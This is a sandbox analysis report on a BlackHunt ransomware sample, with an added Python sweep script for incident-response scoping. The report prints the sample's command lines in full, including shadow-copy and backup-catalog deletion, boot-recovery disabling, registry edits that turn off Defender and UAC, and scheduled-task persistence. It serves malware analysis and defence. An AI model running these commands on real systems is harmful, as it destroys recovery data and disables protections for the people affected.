Analysis
  max time kernel:  171s
  max time network: 188s
  platform:         windows10-2004_x64
  resource:         win10v2004-20231215-en
  resource tags:    arch:x64  arch:x86  image:win10v2004-20231215-en  locale:en-us  os:windows10-2004-x64  system
  submitted:        19/01/2024, 00:19
Static task: static1

Behavioral task: behavioral1
  Sample:   9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe
  Resource: win7-20231129-en

Behavioral task: behavioral2
  Sample:   9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe
  Resource: win10v2004-20231215-en
General
  Target: 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe
  Size:   707KB
  MD5:    0d0f097a0fb4ee1fa6fa1ef654c98d64
  SHA1:   38dc10e381d26c47499a427508297b150b5abf71
  SHA256: 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1
  SHA512: 5239ca5a72b6af0379a14dec7a0b013e93a3eddbd17b7a67aeaf0a966b4b1a6c8446acc0270be25d50de409839f957b8f29fc1c852aace43ce49de88753ef20c
  SSDEEP: 6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1L8Mvnh:6uaTmkZJ+naie5OTamgEoKxLWaSh
Malware Config
  Extracted from: F:\#BlackHunt_ReadMe.hta
  Extracted strings:
    http-equiv="x-ua-compatible"                                (meta tag from the HTA ransom note)
    http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion    (Tor contact address given in the note)
Signatures

Deletes NTFS Change Journal  2 TTPs  1 IoCs
  The NTFS USN change journal is a persistent, per-volume log of file and directory changes. It exists on every NTFS volume, not only on Windows Server; deleting it destroys the timeline forensic tools use to reconstruct which files were written, renamed or deleted during the attack.
  pid   Process
  4348  fsutil.exe

Modifies Windows Defender Real-time Protection settings  1 IoCs
  Key created     | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | reg.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | reg.exe

UAC bypass  1 IoCs
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe

Deletes shadow copies  2 TTPs
  Ransomware often targets backup files to inhibit system recovery.

Modifies boot configuration data using bcdedit  1 TTPs  2 IoCs
  pid   Process
  4744  bcdedit.exe
  1568  bcdedit.exe

Renames multiple (593) files with added filename extension
  This suggests ransomware activity of encrypting all the files on the system.

Deletes backup catalog  1 IoCs
  pid   Process
  4452  wbadmin.exe

Disables Task Manager via registry modification

Disables use of System Restore points  1 TTPs

Checks computer location settings  2 TTPs  1 IoCs
  Looks up the country code configured in the registry, most likely a geofence check.
  Key value queried | \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Control Panel\International\Geo\Nation | 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe

Adds Run key to start application  2 TTPs  1 IoCs
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" | reg.exe

Checks whether UAC is enabled  1 IoCs
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe
Enumerates connected drives  3 TTPs  25 IoCs
  Attempts to read the root path of hard drives other than the default C: drive.
  File opened (read-only) by 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe (23 IoCs):
    \??\A:  \??\B:  \??\E:  \??\G:  \??\H:  \??\I:  \??\J:  \??\K:  \??\L:  \??\M:  \??\N:  \??\O:
    \??\P:  \??\Q:  \??\R:  \??\S:  \??\T:  \??\U:  \??\V:  \??\W:  \??\X:  \??\Y:  \??\Z:
  File opened (read-only) by vssadmin.exe (2 IoCs):
    \??\F:  \??\F:   (consistent with the two vssadmin resize shadowstorage runs against F:\ in the process tree)
  The sample walks every drive letter except C:, D: and F:; the per-letter probing is the enumeration step before encryption of secondary volumes and mapped shares.
Looks up external IP address via web service  1 IoCs
  Uses a legitimate IP lookup service to find the infected system's external IP.
  flow 15 | ip-api.com
Drops file in Program Files directory  64 IoCs
  Process for every entry: 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe

  File created (ransom notes and key files, 32 entries):
    C:\Program Files\Java\jre-1.8\lib\amd64\#BlackHunt_ReadMe.hta
    C:\Program Files\VideoLAN\VLC\locale\ca\LC_MESSAGES\#BlackHunt_ReadMe.hta
    C:\Program Files\VideoLAN\VLC\locale\el\#BlackHunt_Private.key
    C:\Program Files\Java\jdk-1.8\jre\legal\jdk\#BlackHunt_Private.key
    C:\Program Files\VideoLAN\VLC\locale\af\LC_MESSAGES\#BlackHunt_Private.key
    C:\Program Files\VideoLAN\VLC\locale\ps\LC_MESSAGES\#BlackHunt_ReadMe.hta
    C:\Program Files\dotnet\shared\#BlackHunt_ReadMe.hta
    C:\Program Files\VideoLAN\VLC\locale\or\LC_MESSAGES\#BlackHunt_Private.key
    C:\Program Files\Java\jdk-1.8\#BlackHunt_ReadMe.hta
    C:\Program Files\VideoLAN\VLC\locale\de\#BlackHunt_ReadMe.hta
    C:\Program Files\VideoLAN\VLC\locale\pa\LC_MESSAGES\#BlackHunt_ReadMe.txt
    C:\Program Files\Java\jdk-1.8\include\win32\#BlackHunt_ReadMe.hta
    C:\Program Files\VideoLAN\VLC\locale\fy\LC_MESSAGES\#BlackHunt_Private.key
    C:\Program Files\Java\jdk-1.8\lib\#BlackHunt_Private.key
    C:\Program Files\VideoLAN\VLC\locale\vi\LC_MESSAGES\#BlackHunt_ReadMe.hta
    C:\Program Files\VideoLAN\VLC\locale\am\#BlackHunt_ReadMe.hta
    C:\Program Files\Java\jdk-1.8\legal\jdk\#BlackHunt_ReadMe.hta
    C:\Program Files\VideoLAN\VLC\locale\mai\LC_MESSAGES\#BlackHunt_Private.key
    C:\Program Files\VideoLAN\VLC\locale\ps\LC_MESSAGES\#BlackHunt_Private.key
    C:\Program Files\VideoLAN\VLC\locale\sl\LC_MESSAGES\#BlackHunt_ReadMe.txt
    C:\Program Files\VideoLAN\VLC\locale\zh_TW\#BlackHunt_Private.key
    C:\Program Files\VideoLAN\VLC\locale\sk\LC_MESSAGES\#BlackHunt_ReadMe.txt
    C:\Program Files\VideoLAN\VLC\locale\vi\#BlackHunt_Private.key
    C:\Program Files\Java\jdk-1.8\jre\lib\jfr\#BlackHunt_Private.key
    C:\Program Files\VideoLAN\VLC\locale\ka\LC_MESSAGES\#BlackHunt_Private.key
    C:\Program Files\VideoLAN\VLC\locale\mn\#BlackHunt_Private.key
    C:\Program Files\VideoLAN\VLC\locale\an\#BlackHunt_Private.key
    C:\Program Files\VideoLAN\VLC\locale\de\LC_MESSAGES\#BlackHunt_Private.key
    C:\Program Files\VideoLAN\VLC\locale\ks_IN\LC_MESSAGES\#BlackHunt_Private.key
    C:\Program Files\VideoLAN\VLC\locale\nn\LC_MESSAGES\#BlackHunt_ReadMe.txt
    C:\Program Files\Java\jdk-1.8\include\#BlackHunt_Private.key
    C:\Program Files\VideoLAN\VLC\locale\is\#BlackHunt_ReadMe.txt

  File opened for modification (encryption targets, 32 entries):
    C:\Program Files\Java\jdk-1.8\lib\packager.jar
    C:\Program Files\7-Zip\Lang\gl.txt
    C:\Program Files\Java\jre-1.8\lib\deploy\messages_sv.properties
    C:\Program Files\Java\jre-1.8\lib\management\snmp.acl.template
    C:\Program Files\Java\jdk-1.8\jre\lib\fonts\LucidaSansRegular.ttf
    C:\Program Files\Java\jre-1.8\legal\javafx\libxml2.md
    C:\Program Files\Java\jre-1.8\lib\security\policy\limited\US_export_policy.jar
    C:\Program Files\Java\jdk-1.8\legal\javafx\directshow.md
    C:\Program Files\Java\jdk-1.8\jre\legal\jdk\zlib.md
    C:\Program Files\Java\jdk-1.8\legal\jdk\joni.md
    C:\Program Files\Java\jdk-1.8\legal\jdk\xerces.md
    C:\Program Files\Java\jre-1.8\lib\ext\jfxrt.jar
    C:\Program Files\VideoLAN\VLC\locale\fi\LC_MESSAGES\vlc.mo
    C:\Program Files\VideoLAN\VLC\locale\sl\LC_MESSAGES\vlc.mo
    C:\Program Files\Java\jdk-1.8\jre\legal\jdk\jpeg.md
    C:\Program Files\Java\jdk-1.8\jvisualvm.txt
    C:\Program Files\Java\jre-1.8\lib\cmm\CIEXYZ.pf
    C:\Program Files\Java\jre-1.8\lib\ext\localedata.jar
    C:\Program Files\Java\jre-1.8\lib\jce.jar
    C:\Program Files\7-Zip\Lang\hu.txt
    C:\Program Files\7-Zip\Lang\vi.txt
    C:\Program Files\CompareReceive.eps
    C:\Program Files\Java\jdk-1.8\jre\lib\fonts\LucidaTypewriterRegular.ttf
    C:\Program Files\Java\jdk-1.8\legal\jdk\asm.md
    C:\Program Files\Java\jre-1.8\lib\tzdb.dat
    C:\Program Files\VideoLAN\VLC\locale\ug\LC_MESSAGES\vlc.mo
    C:\Program Files\Java\jdk-1.8\jre\lib\charsets.jar
    C:\Program Files\7-Zip\7z.sfx
    C:\Program Files\dotnet\ThirdPartyNotices.txt
    C:\Program Files\Java\jdk-1.8\include\jvmticmlr.h
    C:\Program Files\Java\jre-1.8\lib\images\cursors\win32_MoveDrop32x32.gif
    C:\Program Files\Java\jre-1.8\lib\jfr.jar
Enumerates physical storage devices  1 TTPs
  Attempts to interact with connected storage/optical drive(s).

Checks SCSI registry key(s)  3 TTPs  4 IoCs
  SCSI information is often read in order to detect sandboxing environments. Here, however, every IoC is attributed to vds.exe (the Windows Virtual Disk Service), not to the sample; enumerating the SCSI device tree is part of that service's normal operation, so treat this as a probable side effect of the volume and shadow-storage activity rather than as sandbox evasion by the sample.
  Key opened        | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 | vds.exe
  Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | vds.exe
  Key opened        | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 | vds.exe
  Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName | vds.exe
Creates scheduled task(s)  1 TTPs  1 IoCs
  Schtasks is often used by malware for persistence or to perform post-infection execution.
  pid   Process
  4864  schtasks.exe

Interacts with shadow copies  2 TTPs  5 IoCs
  Shadow copies are often targeted by ransomware to inhibit system recovery.
  pid   Process
  1600  vssadmin.exe
  3404  vssadmin.exe
  3084  vssadmin.exe
  3312  vssadmin.exe
  468   vssadmin.exe

Modifies registry class  8 IoCs
  These entries register the .Hunt2 file extension with the dropped #BlackHunt_Icon.ico as its DefaultIcon, so encrypted files display the ransomware's icon in Explorer.
  Key created     | \REGISTRY\MACHINE\Software\Classes\.Hunt2 | reg.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ | reg.exe
  Key created     | \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon | reg.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" | reg.exe
  Key created     | \REGISTRY\MACHINE\Software\Classes\Hunt2 | reg.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ | reg.exe
  Key created     | \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon | reg.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" | reg.exe
Suspicious use of AdjustPrivilegeToken  13 IoCs
  Token                       pid   Process
  SeDebugPrivilege            1968  9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe
  SeRestorePrivilege          1968  9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe
  SeBackupPrivilege           1968  9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe
  SeTakeOwnershipPrivilege    1968  9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe
  SeAuditPrivilege            1968  9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe
  SeSecurityPrivilege         1968  9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe
  SeIncBasePriorityPrivilege  1968  9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe
  SeBackupPrivilege           3100  vssvc.exe
  SeRestorePrivilege          3100  vssvc.exe
  SeAuditPrivilege            3100  vssvc.exe
  SeBackupPrivilege           5816  wbengine.exe
  SeRestorePrivilege          5816  wbengine.exe
  SeSecurityPrivilege         5816  wbengine.exe
  The entries on PID 1968 are the ones that matter: SeBackupPrivilege, SeRestorePrivilege and SeTakeOwnershipPrivilege together let the sample open and overwrite files regardless of their ACLs. The vssvc.exe and wbengine.exe entries are the Volume Shadow Copy and Windows Backup engine services enabling their own backup privileges in response to the vssadmin and wbadmin calls, which is normal behaviour for those services.
Suspicious use of WriteProcessMemory  64 IoCs
  Source PID 1968 is 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe. Each source/target pair appears twice in the report (two writes per launch), so the 32 pairs below account for all 64 entries. procid_target is the report's own process identifier, not the Windows PID.
  source PID (image as reported)  ->  target PID   procid_target
  1968 (9dd3...a1.exe)            ->  1244         172
  1244 (reg.exe)                  ->  1060         91
  1968 (9dd3...a1.exe)            ->  3800         213
  1968 (9dd3...a1.exe)            ->  3328         211
  1968 (9dd3...a1.exe)            ->  1456         95
  1968 (9dd3...a1.exe)            ->  5072         93
  1968 (9dd3...a1.exe)            ->  3232         97
  3800 (cmd.exe)                  ->  3644         209
  3328 (cmd.exe)                  ->  1676         98
  1968 (9dd3...a1.exe)            ->  864          208
  1968 (9dd3...a1.exe)            ->  4272         207
  1968 (9dd3...a1.exe)            ->  964          206
  1968 (9dd3...a1.exe)            ->  4440         204
  1456 (cmd.exe)                  ->  1628         203
  5072 (cmd.exe)                  ->  3984         102
  1968 (9dd3...a1.exe)            ->  2408         202
  1968 (9dd3...a1.exe)            ->  2692         105
  1968 (9dd3...a1.exe)            ->  5008         201
  1968 (9dd3...a1.exe)            ->  2132         200
  1968 (9dd3...a1.exe)            ->  3844         107
  1968 (9dd3...a1.exe)            ->  3932         197
  3232 (cmd.exe)                  ->  4492         108
  4440 (cmd.exe)                  ->  2884         164
  1968 (9dd3...a1.exe)            ->  468          194
  1968 (9dd3...a1.exe)            ->  916          192
  4272 (cmd.exe)                  ->  2976         110
  1968 (9dd3...a1.exe)            ->  2164         190
  1968 (9dd3...a1.exe)            ->  3412         189
  1968 (9dd3...a1.exe)            ->  2304         188
  864 (cmd.exe)                   ->  1092         186
  1968 (9dd3...a1.exe)            ->  4980         185
  964 (cmd.exe)                   ->  4912         112
  The pattern is the sample writing into each freshly created cmd.exe child (and each cmd.exe into its reg.exe child), which is what CreateProcess does for every launch; it is the fan-out of dozens of children from one parent, not the write itself, that is suspicious.
System policy modification  1 TTPs  3 IoCs
  Key created     | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System | 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" | 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe
  EnableLUA = 0 disables UAC (the change takes effect at the next reboot). EnableLinkedConnections = 1 makes drive letters mapped under the user's standard token visible to the elevated token as well, so network shares the user has mapped become reachable to an elevated encryptor; it is a common ransomware preparation step and worth alerting on by itself.

Uses Task Scheduler COM API  1 TTPs
  The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Uses Volume Shadow Copy service COM API
  The Volume Shadow Copy service is used to manage backups/snapshots.
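The file-system side of the run described in the signatures above (ransom notes and #BlackHunt_Private.key dropped into every touched directory under Program Files, 593 files renamed with an added extension, the .Hunt2 class registered with the dropped icon) translates into a scoping sweep an incident responder runs on a suspected host. The script below is an added example written for this page, not code from the tria.ge report or from the sample. It assumes the added extension is .Hunt2 (inferred from the registry class, since the report shows no renamed file path) and builds a small constructed directory tree in a temporary folder so that it runs offline.

```python
"""Added example (not from the tria.ge report): IR scoping sweep for a BlackHunt-style
run.  Assumption: encrypted files carry the added extension .Hunt2 (inferred from the
.Hunt2 registry class in the report); the directory tree below is constructed."""
import hashlib
import os
import tempfile
from collections import Counter

NOTE_NAMES = {"#BlackHunt_ReadMe.hta", "#BlackHunt_ReadMe.txt"}   # names seen in the report
KEY_NAME = "#BlackHunt_Private.key"                                # dropped per directory in the report
ENC_EXT = ".hunt2"                                                 # assumed added extension, compared case-insensitively


def sha256_file(path):
    """Stream a file through SHA-256; the .key drops are small but the same code serves large files."""
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def sweep(root):
    """Walk `root` and return an IR scoping summary:
       encrypted       - number of files carrying the added extension
       original_exts   - which file types were hit (the extension underneath the added one)
       dirs_with_notes - directories that received at least one ransom note
       key_digests     - distinct SHA-256 values of the dropped .key files; a single digest means
                         every directory got a copy of the same blob, so one copy suffices as evidence."""
    summary = {"encrypted": 0, "original_exts": Counter(), "dirs_with_notes": 0, "key_digests": set()}
    for dirpath, _, files in os.walk(root):
        if NOTE_NAMES & set(files):
            summary["dirs_with_notes"] += 1
        for name in files:
            if name == KEY_NAME:
                summary["key_digests"].add(sha256_file(os.path.join(dirpath, name)))
            elif name.lower().endswith(ENC_EXT):
                summary["encrypted"] += 1
                original = os.path.splitext(name[:-len(ENC_EXT)])[1].lower() or "(no extension)"
                summary["original_exts"][original] += 1
    return summary


def build_constructed_tree():
    """Constructed sample tree mirroring the report's Program Files drops; not real victim data."""
    root = tempfile.mkdtemp(prefix="blackhunt_sweep_")
    layout = {
        "Program Files/7-Zip/Lang": ["gl.txt.Hunt2", "hu.txt.Hunt2", "vi.txt.Hunt2"],
        "Program Files/Java/jre-1.8/lib": ["jce.jar.Hunt2", "tzdb.dat.Hunt2"],
        "Program Files/VideoLAN/VLC/locale/fi/LC_MESSAGES": ["vlc.mo.Hunt2"],
        "Program Files/dotnet": ["ThirdPartyNotices.txt.Hunt2", "untouched.dll"],
    }
    key_blob = b"constructed-key-blob"      # identical bytes in every directory, as a per-victim key would be
    for rel, names in layout.items():
        d = os.path.join(root, rel)
        os.makedirs(d)
        for n in names:
            with open(os.path.join(d, n), "wb") as fh:
                fh.write(b"ciphertext" if n.lower().endswith(ENC_EXT) else b"plain")
        for note in NOTE_NAMES:
            with open(os.path.join(d, note), "w") as fh:
                fh.write("ransom note")
        with open(os.path.join(d, KEY_NAME), "wb") as fh:
            fh.write(key_blob)
    return root


if __name__ == "__main__":
    s = sweep(build_constructed_tree())
    print(f"encrypted={s['encrypted']} dirs_with_notes={s['dirs_with_notes']} "
          f"distinct_key_blobs={len(s['key_digests'])} types={dict(s['original_exts'])}")
```

Point sweep() at the volume root on a real host. The key-file digest check matters for evidence handling: if every dropped #BlackHunt_Private.key hashes identically, one preserved copy carries whatever the attacker embedded and the other copies are duplicates; several distinct digests would mean per-directory material that must all be kept.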
Processes
  Layout: image  [tree depth]  PID  (signatures triggered), followed by the command line.

C:\Users\Admin\AppData\Local\Temp\9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe  [1]  PID 1968
  "C:\Users\Admin\AppData\Local\Temp\9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe"
  signatures: UAC bypass; Checks computer location settings; Checks whether UAC is enabled; Enumerates connected drives; Drops file in Program Files directory; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory; System policy modification

  C:\Windows\System32\cmd.exe  [2]  PID 1244
    "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f
    C:\Windows\system32\reg.exe  [3]  PID 1060  (Modifies registry class)
      reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f

  C:\Windows\System32\cmd.exe  [2]  PID 5072  (Suspicious use of WriteProcessMemory)
    "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f
    C:\Windows\system32\reg.exe  [3]  PID 3984  (Adds Run key to start application)
      reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f

  C:\Windows\System32\cmd.exe  [2]  PID 1456  (Suspicious use of WriteProcessMemory)
    "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
    C:\Windows\system32\reg.exe  [3]  PID 1628  (Modifies registry class)
      reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f

  C:\Windows\System32\cmd.exe  [2]  PID 3232  (Suspicious use of WriteProcessMemory)
    "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
    C:\Windows\system32\reg.exe  [3]  PID 4492
      reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f

  C:\Windows\System32\cmd.exe  [2]  PID 2692
    "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f
    C:\Windows\system32\reg.exe  [3]  PID 2248
      reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f
    (Action value 6 in this Defender policy means "Ignore": detections of that severity are logged but not remediated. The same value is applied to Severe and Medium further down.)

  C:\Windows\System32\cmd.exe  [2]  PID 3844
    "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f
    C:\Windows\system32\reg.exe  [3]  PID 4860
      reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f

  C:\Windows\System32\cmd.exe  [2]  PID 2232
    "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f
    C:\Windows\system32\reg.exe  [3]  PID 2520
      reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f

  C:\Windows\System32\cmd.exe  [2]  PID 4452
    "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f
    C:\Windows\system32\reg.exe  [3]  PID 1512
      reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f

  C:\Windows\System32\cmd.exe  [2]  PID 3332
    "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded
    C:\Windows\system32\vssadmin.exe  [3]  PID 3312  (Interacts with shadow copies)
      vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded

  C:\Windows\System32\cmd.exe  [2]  PID 1692
    "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB
    C:\Windows\system32\vssadmin.exe  [3]  PID 3404  (Interacts with shadow copies)
      vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB
    (Shrinking the shadow storage limit below current usage forces VSS to discard existing snapshots. This removes shadow copies without a "delete shadows" command line, which is the string many detection rules key on; the explicit delete follows later anyway.)

  C:\Windows\System32\cmd.exe  [2]  PID 1908
    "C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:
    C:\Windows\system32\fsutil.exe  [3]  PID 4348  (Deletes NTFS Change Journal)
      fsutil.exe usn deletejournal /D C:

  C:\Windows\System32\cmd.exe  [2]  PID 4032
    "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
    C:\Windows\system32\bcdedit.exe  [3]  PID 4744  (Modifies boot configuration data using bcdedit)
      bcdedit /set {default} bootstatuspolicy IgnoreAllFailures

  C:\Windows\System32\cmd.exe  [2]  PID 4564
    "C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet
    C:\Windows\system32\wbadmin.exe  [3]  PID 4452  (Deletes backup catalog)
      wbadmin.exe delete catalog -quiet

  C:\Windows\System32\cmd.exe  [2]  PID 3820
    "C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
    C:\Windows\system32\schtasks.exe  [3]  PID 4168
      schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable

  C:\Windows\System32\cmd.exe  [2]  PID 2268
    "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No

  C:\Windows\System32\cmd.exe  [2]  PID 4984
    "C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet

  C:\Windows\System32\cmd.exe  [2]  PID 3960
    "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded

  C:\Windows\System32\cmd.exe  [2]  PID 4220
    "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB

  C:\Windows\System32\cmd.exe  [2]  PID 4648
    "C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe" /F
    (Persistence: the sample re-launches as SYSTEM at every boot, so the UAC and policy changes above survive the reboot and a partially cleaned host re-encrypts. Delete this task before rebooting a host for remediation.)

  C:\Windows\System32\cmd.exe  [2]  PID 2356
    "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f

  C:\Windows\System32\cmd.exe  [2]  PID 2940
    "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f

  C:\Windows\System32\cmd.exe  [2]  PID 4328
    "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f

  C:\Windows\System32\cmd.exe  [2]  PID 4972
    "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f

  C:\Windows\System32\cmd.exe  [2]  PID 2800
    "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f

  C:\Windows\System32\cmd.exe  [2]  PID 4980
    "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f

  C:\Windows\System32\cmd.exe  [2]  PID 2304
